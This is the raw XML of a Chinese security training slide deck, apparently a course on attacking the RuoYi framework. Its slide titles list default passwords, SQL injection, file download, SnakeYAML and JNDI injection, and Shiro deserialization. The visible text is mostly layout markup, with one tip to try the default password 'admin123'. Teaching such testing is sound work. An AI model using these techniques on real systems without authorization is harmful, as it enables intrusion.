                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="" showAsIcon="1" r:id="rId1" imgW="971550" imgH="95250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94205" y="4010025"/>
                        <a:ext cx="971550" cy="95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shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原理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5185" y="2555875"/>
            <a:ext cx="4140200" cy="1371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05" y="1426210"/>
            <a:ext cx="5727700" cy="673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725" y="2679065"/>
            <a:ext cx="5612765" cy="329628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shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具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8210" y="1137285"/>
            <a:ext cx="7567930" cy="554101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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1381374"/>
            <a:ext cx="8105565" cy="4091077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1346 w 2540"/>
              <a:gd name="T1" fmla="*/ 1282 h 1282"/>
              <a:gd name="T2" fmla="*/ 0 w 2540"/>
              <a:gd name="T3" fmla="*/ 1282 h 1282"/>
              <a:gd name="T4" fmla="*/ 0 w 2540"/>
              <a:gd name="T5" fmla="*/ 0 h 1282"/>
              <a:gd name="T6" fmla="*/ 2540 w 2540"/>
              <a:gd name="T7" fmla="*/ 0 h 1282"/>
              <a:gd name="T8" fmla="*/ 1346 w 2540"/>
              <a:gd name="T9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0" h="1282">
                <a:moveTo>
                  <a:pt x="1346" y="1282"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2540" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346" y="1282"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId1"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect t="-25000" b="-10000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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3740048" y="1381374"/>
            <a:ext cx="4365517" cy="4091077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 171 w 1368"/>
              <a:gd name="T1" fmla="*/ 1282 h 1282"/>
              <a:gd name="T2" fmla="*/ 0 w 1368"/>
              <a:gd name="T3" fmla="*/ 1282 h 1282"/>
              <a:gd name="T4" fmla="*/ 1225 w 1368"/>
              <a:gd name="T5" fmla="*/ 0 h 1282"/>
              <a:gd name="T6" fmla="*/ 1368 w 1368"/>
              <a:gd name="T7" fmla="*/ 0 h 1282"/>
              <a:gd name="T8" fmla="*/ 171 w 1368"/>
              <a:gd name="T9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68" h="1282">
                <a:moveTo>
                  <a:pt x="171" y="1282"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1225" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="171" y="1282"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BC282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" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4839550" y="1381374"/>
            <a:ext cx="7352450" cy="4091077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2304 w 2304"/>
              <a:gd name="T1" fmla="*/ 1282 h 1282"/>
              <a:gd name="T2" fmla="*/ 0 w 2304"/>
              <a:gd name="T3" fmla="*/ 1282 h 1282"/>
              <a:gd name="T4" fmla="*/ 1213 w 2304"/>
              <a:gd name="T5" fmla="*/ 0 h 1282"/>
              <a:gd name="T6" fmla="*/ 2304 w 2304"/>
              <a:gd name="T7" fmla="*/ 0 h 1282"/>
              <a:gd name="T8" fmla="*/ 2304 w 2304"/>
              <a:gd name="T9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04" h="1282">
                <a:moveTo>
                  <a:pt x="2304" y="1282"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304" y="1282"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0162A7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9" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8959346" y="392112"/>
            <a:ext cx="3232654" cy="727586"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1013 w 1013"/>
              <a:gd name="T1" fmla="*/ 228 h 228"/>
              <a:gd name="T2" fmla="*/ 0 w 1013"/>
              <a:gd name="T3" fmla="*/ 228 h 228"/>
              <a:gd name="T4" fmla="*/ 208 w 1013"/>
              <a:gd name="T5" fmla="*/ 0 h 228"/>
              <a:gd name="T6" fmla="*/ 1013 w 1013"/>
              <a:gd name="T7" fmla="*/ 0 h 228"/>
              <a:gd name="T8" fmla="*/ 1013 w 1013"/>
              <a:gd name="T9" fmla="*/ 228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3" h="228">
                <a:moveTo>
                  <a:pt x="1013" y="228"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1013" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1013" y="228"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BC282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0" y="392112"/>
            <a:ext cx="3203932" cy="181898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Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9080611" y="6142596"/>
            <a:ext cx="3111389" cy="181898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Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="816538"/>
            <a:ext cx="4531458" cy="181898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Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7660542" y="5718171"/>
            <a:ext cx="4531458" cy="181898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Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5718171"/>
            <a:ext cx="4110224" cy="756308"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1060 w 1288"/>
              <a:gd name="T1" fmla="*/ 237 h 237"/>
              <a:gd name="T2" fmla="*/ 0 w 1288"/>
              <a:gd name="T3" fmla="*/ 237 h 237"/>
              <a:gd name="T4" fmla="*/ 0 w 1288"/>
              <a:gd name="T5" fmla="*/ 0 h 237"/>
              <a:gd name="T6" fmla="*/ 1288 w 1288"/>
              <a:gd name="T7" fmla="*/ 0 h 237"/>
              <a:gd name="T8" fmla="*/ 1060 w 1288"/>
              <a:gd name="T9" fmla="*/ 237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8" h="237">
                <a:moveTo>
                  <a:pt x="1060" y="237"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="237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t="-25000"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696598" y="3226065"/>
            <a:ext cx="42883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  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="8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6109853" y="4588045"/>
            <a:ext cx="57737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8484870" y="1668780"/>
            <a:ext cx="352806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传承高铁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守护天机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754072" y="4672364"/>
            <a:ext cx="323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河北中车数智科技有限</a:t>
            </a:r>
            <a:r>
              <a:rPr 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公司</a:t>
            </a:r>
            <a:endParaRPr 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基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息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41960" y="1223645"/>
            <a:ext cx="11031220" cy="1553210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" i="0"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750" y="1786890"/>
            <a:ext cx="10941050" cy="316230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1655892"/>
            <a:ext cx="12191999" cy="3546216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect t="-6000" b="-5000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0" y="1655892"/>
            <a:ext cx="12191999" cy="3546216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 t="-6000" b="-5000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5133217" y="3239439"/>
            <a:ext cx="719255" cy="37901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02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668" y="2967981"/>
            <a:ext cx="2926080" cy="922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情况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752255" y="0"/>
            <a:ext cx="6847965" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4180"/>
              <a:gd name="T1" fmla="*/ 0 h 4740"/>
              <a:gd name="T2" fmla="*/ 1674 w 4180"/>
              <a:gd name="T3" fmla="*/ 2337 h 4740"/>
              <a:gd name="T4" fmla="*/ 0 w 4180"/>
              <a:gd name="T5" fmla="*/ 4740 h 4740"/>
              <a:gd name="T6" fmla="*/ 2459 w 4180"/>
              <a:gd name="T7" fmla="*/ 4740 h 4740"/>
              <a:gd name="T8" fmla="*/ 4180 w 4180"/>
              <a:gd name="T9" fmla="*/ 2337 h 4740"/>
              <a:gd name="T10" fmla="*/ 2459 w 4180"/>
              <a:gd name="T11" fmla="*/ 0 h 4740"/>
              <a:gd name="T12" fmla="*/ 0 w 4180"/>
              <a:gd name="T13" fmla="*/ 0 h 4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80" h="4740">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1674" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4180" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0162A7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Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8182135" y="0"/>
            <a:ext cx="3625490" cy="3381255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2213 w 2213"/>
              <a:gd name="T1" fmla="*/ 2337 h 2337"/>
              <a:gd name="T2" fmla="*/ 1722 w 2213"/>
              <a:gd name="T3" fmla="*/ 2337 h 2337"/>
              <a:gd name="T4" fmla="*/ 0 w 2213"/>
              <a:gd name="T5" fmla="*/ 0 h 2337"/>
              <a:gd name="T6" fmla="*/ 492 w 2213"/>
              <a:gd name="T7" fmla="*/ 0 h 2337"/>
              <a:gd name="T8" fmla="*/ 2213 w 2213"/>
              <a:gd name="T9" fmla="*/ 2337 h 2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13" h="2337">
                <a:moveTo>
                  <a:pt x="2213" y="2337"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1722" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213" y="2337"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BC282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fofa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9105" y="1229360"/>
            <a:ext cx="9351645" cy="556069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课堂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作业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21640" y="1490345"/>
            <a:ext cx="11031220" cy="613410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="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zh-CN" altLang="en-US" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在进行资产收集的时候如果遇到后台为若依框架，收集额外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的特征用于空间测绘引擎</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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1655892"/>
            <a:ext cx="12191999" cy="3546216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect t="-6000" b="-5000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0" y="1655892"/>
            <a:ext cx="12191999" cy="3546216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 t="-6000" b="-5000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5133217" y="3239439"/>
            <a:ext cx="719255" cy="37901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03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668" y="2967981"/>
            <a:ext cx="2926080" cy="922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漏洞</a:t>
            </a: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752255" y="0"/>
            <a:ext cx="6847965" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4180"/>
              <a:gd name="T1" fmla="*/ 0 h 4740"/>
              <a:gd name="T2" fmla="*/ 1674 w 4180"/>
              <a:gd name="T3" fmla="*/ 2337 h 4740"/>
              <a:gd name="T4" fmla="*/ 0 w 4180"/>
              <a:gd name="T5" fmla="*/ 4740 h 4740"/>
              <a:gd name="T6" fmla="*/ 2459 w 4180"/>
              <a:gd name="T7" fmla="*/ 4740 h 4740"/>
              <a:gd name="T8" fmla="*/ 4180 w 4180"/>
              <a:gd name="T9" fmla="*/ 2337 h 4740"/>
              <a:gd name="T10" fmla="*/ 2459 w 4180"/>
              <a:gd name="T11" fmla="*/ 0 h 4740"/>
              <a:gd name="T12" fmla="*/ 0 w 4180"/>
              <a:gd name="T13" fmla="*/ 0 h 4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80" h="4740">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1674" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4180" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0162A7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Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8182135" y="0"/>
            <a:ext cx="3625490" cy="3381255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2213 w 2213"/>
              <a:gd name="T1" fmla="*/ 2337 h 2337"/>
              <a:gd name="T2" fmla="*/ 1722 w 2213"/>
              <a:gd name="T3" fmla="*/ 2337 h 2337"/>
              <a:gd name="T4" fmla="*/ 0 w 2213"/>
              <a:gd name="T5" fmla="*/ 0 h 2337"/>
              <a:gd name="T6" fmla="*/ 492 w 2213"/>
              <a:gd name="T7" fmla="*/ 0 h 2337"/>
              <a:gd name="T8" fmla="*/ 2213 w 2213"/>
              <a:gd name="T9" fmla="*/ 2337 h 2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13" h="2337">
                <a:moveTo>
                  <a:pt x="2213" y="2337"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1722" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213" y="2337"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BC282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默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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21640" y="1378585"/>
            <a:ext cx="11031220" cy="977265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr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 sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>若依框架，默认将用户名和密码填充到登录页面。如果开发人员没有安全意识，则可能以默认密码登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成功。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p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 sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>默认将用户名和密码填充到登录页面，可以尝试使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“admin123”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>默认密码进行尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>登录。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
              <a:latin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3545" y="2467610"/>
            <a:ext cx="4273550" cy="374015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tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ISPRING_PRESENTATION_TITLE" val="简介"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMDJhNWZiMmUyMGY4ZDMwZDY1MjlmNDVkMjgyMTgzZGEifQ=="/>
  <p:tag name="KSO_WPP_MARK_KEY" val="156cdff4-1078-446b-af05-d9d237a2dda9"/>
  <p:tag name="commondata" val="eyJoZGlkIjoiZWIxZTY3YmY2YmMzOWQ5NTM2NDcyNzBlMmI0OGNkYzAifQ=="/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst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自定义 2200">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0162A7"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="BC2823"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="BC2823"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0162A7"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="BC2823"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="0162A7"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="BC2823"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="0162A7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3077</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>220</Paragraphs>
  <Slides>35</Slides>
  <Notes>74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5" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>Package</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>基本信息</vt:lpstr>
      <vt:lpstr>基本信息</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>fofa</vt:lpstr>
      <vt:lpstr>课堂作业</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>默认密码</vt:lpstr>
      <vt:lpstr>默认密码-原理</vt:lpstr>
      <vt:lpstr>任意用户注册</vt:lpstr>
      <vt:lpstr>任意用户注册</vt:lpstr>
      <vt:lpstr>druid泄露</vt:lpstr>
      <vt:lpstr>druid泄露</vt:lpstr>
      <vt:lpstr>druid泄露-uri监控</vt:lpstr>
      <vt:lpstr>druid泄露-session监控</vt:lpstr>
      <vt:lpstr>Swagger-ui泄露</vt:lpstr>
      <vt:lpstr>Swagger-原理</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入-原理</vt:lpstr>
      <vt:lpstr>任意文件下载</vt:lpstr>
      <vt:lpstr>任意文件下载-原理</vt:lpstr>
      <vt:lpstr>任意文件下载-原理</vt:lpstr>
      <vt:lpstr>定时任务</vt:lpstr>
      <vt:lpstr>定时任务-原理</vt:lpstr>
      <vt:lpstr>定时任务-原理</vt:lpstr>
      <vt:lpstr>定时任务-SnakeYAML反序列化</vt:lpstr>
      <vt:lpstr>定时任务-SnakeYAML反序列化</vt:lpstr>
      <vt:lpstr>定时任务-jndi注入</vt:lpstr>
      <vt:lpstr>定时任务-jndi注入</vt:lpstr>
      <vt:lpstr>定时任务-jndi注入</vt:lpstr>
      <vt:lpstr>shiro反序列化</vt:lpstr>
      <vt:lpstr>shiro反序列化-原理</vt:lpstr>
      <vt:lpstr>shiro反序列化-工具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bai</dc:creator>
  <dc:description>锐旗设计；https://9ppt.taobao.com</dc:description>
  <cp:lastModifiedBy>泡泡</cp:lastModifiedBy>
  <cp:revision>572</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-05-05T08:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-04T09:59:59Z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2052-12.1.0.18909</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>E624302D68BE4B7FB7C80D9271A22C73_13</vt:lpwstr>
  </property>
</Properties>
</file>